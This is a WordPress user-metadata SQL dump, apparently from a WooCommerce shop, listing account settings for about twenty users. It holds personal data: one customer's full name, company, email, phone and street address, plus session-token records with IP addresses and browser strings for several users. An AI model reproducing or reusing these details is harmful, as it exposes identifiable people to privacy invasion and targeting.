INSERT INTO `wp_usermeta` VALUES (25477, 1753, 'nickname', 'cubanstallion24691960'); 
INSERT INTO `wp_usermeta` VALUES (25478, 1753, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25479, 1753, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25480, 1753, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25481, 1753, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25482, 1753, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25483, 1753, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25484, 1753, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25485, 1753, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25486, 1753, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25487, 1753, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25488, 1753, '_yoast_wpseo_profile_updated', '1500334363'); 
INSERT INTO `wp_usermeta` VALUES (25489, 1753, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25490, 1754, 'nickname', 'purchasing6'); 
INSERT INTO `wp_usermeta` VALUES (25491, 1754, 'first_name', 'Greg'); 
INSERT INTO `wp_usermeta` VALUES (25492, 1754, 'last_name', 'Phelps'); 
INSERT INTO `wp_usermeta` VALUES (25493, 1754, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25494, 1754, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25495, 1754, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25496, 1754, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25497, 1754, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25498, 1754, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25499, 1754, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25500, 1754, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25501, 1754, '_yoast_wpseo_profile_updated', '1500335512'); 
INSERT INTO `wp_usermeta` VALUES (25502, 1754, 'session_tokens', 'a:2:{s:64:"b2036e83c0fa3d2342f3fbfe6fe8c2b8c22d454389065e519b125fb796214126";a:4:{s:10:"expiration";i:1501545122;s:2:"ip";s:13:"50.245.149.17";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0";s:5:"login";i:1500335522;}s:64:"454c38036a42547443d0815745fa4b5db915dd78b76bfdaa8b8b73b1c0092f5a";a:4:{s:10:"expiration";i:1501545215;s:2:"ip";s:13:"50.245.149.17";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0";s:5:"login";i:1500335615;}}'); 
INSERT INTO `wp_usermeta` VALUES (25503, 1754, 'last_update', '1500335607'); 
INSERT INTO `wp_usermeta` VALUES (25504, 1755, 'nickname', 'bubbyandjuno1965'); 
INSERT INTO `wp_usermeta` VALUES (25505, 1755, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25506, 1755, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25507, 1755, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25508, 1755, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25509, 1755, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25510, 1755, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25511, 1755, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25512, 1755, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25513, 1755, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25514, 1755, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25515, 1755, '_yoast_wpseo_profile_updated', '1500337430'); 
INSERT INTO `wp_usermeta` VALUES (25516, 1755, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25517, 1756, 'nickname', 'laurenschultz21970'); 
INSERT INTO `wp_usermeta` VALUES (25518, 1756, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25519, 1756, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25520, 1756, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25521, 1756, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25522, 1756, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25523, 1756, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25524, 1756, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25525, 1756, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25526, 1756, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25527, 1756, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25528, 1756, '_yoast_wpseo_profile_updated', '1500339036'); 
INSERT INTO `wp_usermeta` VALUES (25529, 1756, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25530, 1757, 'nickname', 'tescape071952'); 
INSERT INTO `wp_usermeta` VALUES (25531, 1757, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25532, 1757, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25533, 1757, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25534, 1757, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25535, 1757, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25536, 1757, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25537, 1757, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25538, 1757, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25539, 1757, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25540, 1757, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25541, 1757, '_yoast_wpseo_profile_updated', '1500339650'); 
INSERT INTO `wp_usermeta` VALUES (25542, 1757, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25543, 1758, 'nickname', 'ronsde1996'); 
INSERT INTO `wp_usermeta` VALUES (25544, 1758, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25545, 1758, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25546, 1758, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25547, 1758, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25548, 1758, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25549, 1758, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25550, 1758, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25551, 1758, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25552, 1758, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25553, 1758, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25554, 1758, '_yoast_wpseo_profile_updated', '1500345242'); 
INSERT INTO `wp_usermeta` VALUES (25555, 1758, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25556, 1759, 'nickname', 'vardjian1980'); 
INSERT INTO `wp_usermeta` VALUES (25557, 1759, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25558, 1759, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25559, 1759, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25560, 1759, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25561, 1759, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25562, 1759, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25563, 1759, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25564, 1759, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25565, 1759, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25566, 1759, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25567, 1759, '_yoast_wpseo_profile_updated', '1500348728'); 
INSERT INTO `wp_usermeta` VALUES (25568, 1759, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25569, 1760, 'nickname', 'robcoles31966'); 
INSERT INTO `wp_usermeta` VALUES (25570, 1760, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25571, 1760, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25572, 1760, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25573, 1760, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25574, 1760, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25575, 1760, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25576, 1760, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25577, 1760, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25578, 1760, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25579, 1760, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25580, 1760, '_yoast_wpseo_profile_updated', '1500358812'); 
INSERT INTO `wp_usermeta` VALUES (25581, 1760, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25582, 1761, 'nickname', 'leijie12211969'); 
INSERT INTO `wp_usermeta` VALUES (25583, 1761, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25584, 1761, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25585, 1761, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25586, 1761, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25587, 1761, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25588, 1761, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25589, 1761, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25590, 1761, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25591, 1761, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25592, 1761, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25593, 1761, '_yoast_wpseo_profile_updated', '1500360251'); 
INSERT INTO `wp_usermeta` VALUES (25594, 1761, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25595, 1762, 'nickname', 'robertcwilliams2000'); 
INSERT INTO `wp_usermeta` VALUES (25596, 1762, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25597, 1762, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25598, 1762, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25599, 1762, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25600, 1762, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25601, 1762, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25602, 1762, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25603, 1762, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25604, 1762, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25605, 1762, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25606, 1762, '_yoast_wpseo_profile_updated', '1500362042'); 
INSERT INTO `wp_usermeta` VALUES (25607, 1762, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25608, 1763, 'nickname', 'agybear242000'); 
INSERT INTO `wp_usermeta` VALUES (25609, 1763, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25610, 1763, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25611, 1763, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25612, 1763, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25613, 1763, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25614, 1763, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25615, 1763, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25616, 1763, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25617, 1763, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25618, 1763, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25619, 1763, '_yoast_wpseo_profile_updated', '1500367525'); 
INSERT INTO `wp_usermeta` VALUES (25620, 1763, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25621, 1764, 'nickname', 'RPAINTER'); 
INSERT INTO `wp_usermeta` VALUES (25622, 1764, 'first_name', 'RICH'); 
INSERT INTO `wp_usermeta` VALUES (25623, 1764, 'last_name', 'PAINTER'); 
INSERT INTO `wp_usermeta` VALUES (25624, 1764, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25625, 1764, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25626, 1764, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25627, 1764, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25628, 1764, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25629, 1764, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25630, 1764, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25631, 1764, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25632, 1764, '_yoast_wpseo_profile_updated', '1500381421'); 
INSERT INTO `wp_usermeta` VALUES (25633, 1764, 'session_tokens', 'a:1:{s:64:"b2f3ba7ae273da3e05532d0b07449ea1f8ed5bf52af64ccff777e34b52a38edb";a:4:{s:10:"expiration";i:1501591029;s:2:"ip";s:14:"63.241.190.224";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500381429;}}'); 
INSERT INTO `wp_usermeta` VALUES (25634, 1764, 'last_update', '1500381467'); 
INSERT INTO `wp_usermeta` VALUES (25635, 1764, 'billing_first_name', 'RICH'); 
INSERT INTO `wp_usermeta` VALUES (25636, 1764, 'billing_last_name', 'PAINTER'); 
INSERT INTO `wp_usermeta` VALUES (25637, 1764, 'billing_company', 'IBT INC'); 
INSERT INTO `wp_usermeta` VALUES (25638, 1764, 'billing_email', 'rpainter@ibtinc.com'); 
INSERT INTO `wp_usermeta` VALUES (25639, 1764, 'billing_phone', '9134282861'); 
INSERT INTO `wp_usermeta` VALUES (25640, 1764, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (25641, 1764, 'billing_address_1', '5420 HAYES'); 
INSERT INTO `wp_usermeta` VALUES (25642, 1764, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (25643, 1764, 'billing_city', 'MERRIAM'); 
INSERT INTO `wp_usermeta` VALUES (25644, 1764, 'billing_state', 'KS'); 
INSERT INTO `wp_usermeta` VALUES (25645, 1764, 'billing_postcode', '66203'); 
INSERT INTO `wp_usermeta` VALUES (25646, 1764, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25647, 1765, 'nickname', 'leestabert1985'); 
INSERT INTO `wp_usermeta` VALUES (25648, 1765, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25649, 1765, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25650, 1765, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25651, 1765, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25652, 1765, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25653, 1765, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25654, 1765, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25655, 1765, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25656, 1765, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25657, 1765, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25658, 1765, '_yoast_wpseo_profile_updated', '1500382112'); 
INSERT INTO `wp_usermeta` VALUES (25659, 1765, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25660, 1766, 'nickname', 'john.cabrera'); 
INSERT INTO `wp_usermeta` VALUES (25661, 1766, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25662, 1766, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25663, 1766, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25664, 1766, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25665, 1766, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25666, 1766, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25667, 1766, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25668, 1766, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25669, 1766, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25670, 1766, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25671, 1766, '_yoast_wpseo_profile_updated', '1500384080'); 
INSERT INTO `wp_usermeta` VALUES (25672, 1766, 'session_tokens', 'a:1:{s:64:"db0cde49daa2913e1a9fc602fc75cb7336ab0b4812e49025f2c04ba85b5c23ff";a:4:{s:10:"expiration";i:1501593690;s:2:"ip";s:13:"12.45.190.138";s:2:"ua";s:117:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4";s:5:"login";i:1500384090;}}'); 
INSERT INTO `wp_usermeta` VALUES (25673, 1766, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25674, 1767, 'nickname', 'dan_steen1950'); 
INSERT INTO `wp_usermeta` VALUES (25675, 1767, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25676, 1767, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25677, 1767, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25678, 1767, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25679, 1767, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25680, 1767, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25681, 1767, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25682, 1767, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25683, 1767, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25684, 1767, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25685, 1767, '_yoast_wpseo_profile_updated', '1500385600'); 
INSERT INTO `wp_usermeta` VALUES (25686, 1767, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25687, 1768, 'nickname', 'jus4pla1954'); 
INSERT INTO `wp_usermeta` VALUES (25688, 1768, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25689, 1768, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25690, 1768, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25691, 1768, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25692, 1768, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25693, 1768, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25694, 1768, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25695, 1768, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25696, 1768, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25697, 1768, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25698, 1768, '_yoast_wpseo_profile_updated', '1500385913'); 
INSERT INTO `wp_usermeta` VALUES (25699, 1768, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25700, 1769, 'nickname', 'ana.montez'); 
INSERT INTO `wp_usermeta` VALUES (25701, 1769, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25702, 1769, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25703, 1769, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25704, 1769, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25705, 1769, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25706, 1769, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25707, 1769, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25708, 1769, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25709, 1769, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25710, 1769, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25711, 1769, '_yoast_wpseo_profile_updated', '1500386927'); 
INSERT INTO `wp_usermeta` VALUES (25713, 1770, 'nickname', 'pixie_shadow2004'); 
INSERT INTO `wp_usermeta` VALUES (25714, 1770, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25715, 1770, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25716, 1770, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25717, 1770, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25718, 1770, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25719, 1770, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25720, 1770, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25721, 1770, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25722, 1770, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25723, 1770, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25724, 1770, '_yoast_wpseo_profile_updated', '1500390905'); 
INSERT INTO `wp_usermeta` VALUES (25725, 1770, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25726, 1771, 'nickname', 'byron.crutcher'); 
INSERT INTO `wp_usermeta` VALUES (25727, 1771, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25728, 1771, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25729, 1771, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25730, 1771, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25731, 1771, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25732, 1771, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25733, 1771, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25734, 1771, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25735, 1771, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25736, 1771, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25737, 1771, '_yoast_wpseo_profile_updated', '1500392713'); 
INSERT INTO `wp_usermeta` VALUES (25738, 1771, 'session_tokens', 'a:2:{s:64:"d765da6658e87327be294b554ffd8b7434a81c1bd35494f15ecf2bfbeac37e88";a:4:{s:10:"expiration";i:1501602325;s:2:"ip";s:13:"69.27.134.139";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500392725;}s:64:"47514dc1e4a28091c771ee409f4731173fd9598abf9844c5cda9027970bb39e3";a:4:{s:10:"expiration";i:1500565530;s:2:"ip";s:13:"69.27.134.139";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500392730;}}'); 
INSERT INTO `wp_usermeta` VALUES (25739, 1772, 'nickname', 'sdssupport2'); 
INSERT INTO `wp_usermeta` VALUES (25740, 1772, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25741, 1772, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25742, 1772, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25743, 1772, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25744, 1772, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25745, 1772, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25746, 1772, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25747, 1772, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25748, 1772, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25749, 1772, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25750, 1772, '_yoast_wpseo_profile_updated', '1500392835'); 
INSERT INTO `wp_usermeta` VALUES (25751, 1772, 'session_tokens', 'a:1:{s:64:"3b795e41bc17179cc58d4f292a02c9a3200deb1a12b31fa7c17da7acdaf80a7d";a:4:{s:10:"expiration";i:1501602451;s:2:"ip";s:11:"203.32.4.16";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1500392851;}}'); 
INSERT INTO `wp_usermeta` VALUES (25752, 1771, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (25753, 1773, 'nickname', 'amdunphy1951'); 
INSERT INTO `wp_usermeta` VALUES (25754, 1773, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25755, 1773, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25756, 1773, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25757, 1773, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25758, 1773, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25759, 1773, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25760, 1773, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25761, 1773, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25762, 1773, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25763, 1773, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25764, 1773, '_yoast_wpseo_profile_updated', '1500392983'); 
INSERT INTO `wp_usermeta` VALUES (25765, 1773, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (25766, 1774, 'nickname', 'chris.weishaar'); 
INSERT INTO `wp_usermeta` VALUES (25767, 1774, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25768, 1774, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (25769, 1774, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (25770, 1774, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25771, 1774, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (25772, 1774, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (25773, 1774, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (25774, 1774, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (25775, 1774, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (25776, 1774, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (25777, 1774, '_yoast_wpseo_profile_updated', '1500396365'); 
